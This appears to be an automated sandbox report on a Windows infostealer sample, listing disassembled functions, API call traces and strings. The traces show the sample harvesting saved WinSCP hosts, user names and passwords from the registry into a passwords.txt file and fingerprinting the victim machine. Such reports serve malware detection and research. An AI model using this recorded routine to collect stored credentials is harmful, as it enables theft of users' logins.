                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll
                                                                                                                                                                                                                                                                                • API String ID: 2593893887-2466989068
                                                                                                                                                                                                                                                                                • Opcode ID: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                • Instruction ID: fa4f152899c94b2b2f6a7a6abf1eb692faa9c8451fb2198c09e274f393329d92
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2951B4B0A45750AFD711AF25FD42B257AA3EB80705354203FB902A71F3DBBA5450AFE8
                                                                                                                                                                                                                                                                                Function 0040D9C0 Relevance: 58.1, APIs: 18, Strings: 15, Instructions: 370registrystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 2447 40d9c0-40da5d memset * 4 RegOpenKeyExA 2448 40daa2-40dac8 call 410230 * 4 2447->2448 2449 40da5f-40da87 RegGetValueA 2447->2449 2451 40da89-40da8c 2449->2451 2452 40da8e-40da95 2449->2452 2454 40da97-40da99 2451->2454 2452->2454 2455 40dacb-40dacd 2452->2455 2454->2448 2459 40da9b-40da9c RegCloseKey 2454->2459 2457 40dadd-40daf4 RegOpenKeyExA 2455->2457 2458 40dacf-40dad6 RegCloseKey 2455->2458 2457->2448 2461 40daf6-40db22 RegEnumKeyExA 2457->2461 2458->2457 2459->2448 2461->2451 2463 40db28-40db3e call 4101c0 2461->2463 2469 40dbb2-40dc51 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA 2463->2469 2489 40dc53-40dc6a call 410340 call 410290 2469->2489 2490 40dc6c-40dc90 call 411ea0 call 4102e0 call 410290 call 410230 2469->2490 2499 40dc92-40dd5c call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA call 410340 call 410290 call 410230 StrCmpCA 2489->2499 2490->2499 2531 40dd62-40dd80 call 40d250 2499->2531 2532 40db4b-40dbac call 410340 call 410290 call 410230 RegEnumKeyExA 2499->2532 2538 40dd82 2531->2538 2539 40dd85-40dda9 call 410340 call 410290 call 410230 2531->2539 2532->2469 2546 40dde4-40de5c call 410530 lstrlenA call 410530 call 4101c0 call 406f80 call 413e50 call 410230 2532->2546 2538->2539 2539->2532 2552 40ddaf-40ddbe 2539->2552 2570 40de6c-40de77 call 410230 2546->2570 2571 40de5e-40de65 RegCloseKey 2546->2571 2554 40db42-40db48 ??3@YAXPAX@Z 2552->2554 2555 40ddc4-40ddc6 2552->2555 2554->2532 2557 40ddc8-40ddcd 2555->2557 2558 40dddf _invalid_parameter_noinfo_noreturn 2555->2558 2557->2558 2560 40ddcf-40ddd4 2557->2560 2558->2546 2560->2558 2562 40ddd6-40ddd9 2560->2562 2562->2558 2564 40db40 2562->2564 2564->2554 2570->2448 2571->2570
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                                • API String ID: 3659326365-2564332296
                                                                                                                                                                                                                                                                                • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9
                                                                                                                                                                                                                                                                                Function 00413510 Relevance: 49.8, APIs: 2, Strings: 26, Instructions: 776stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 2574 413510-413e47 call 4101c0 call 410340 call 410290 call 410230 call 401360 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411120 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410700 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410540 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 GetCurrentProcessId call 411cc0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4107c0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108e0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108b0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4110a0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4109f0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410990 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410b30 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410be0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410ba0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410cb0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d30 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410fe0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 call 4101c0 call 410200 * 4 call 413e50 call 410230 * 6
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
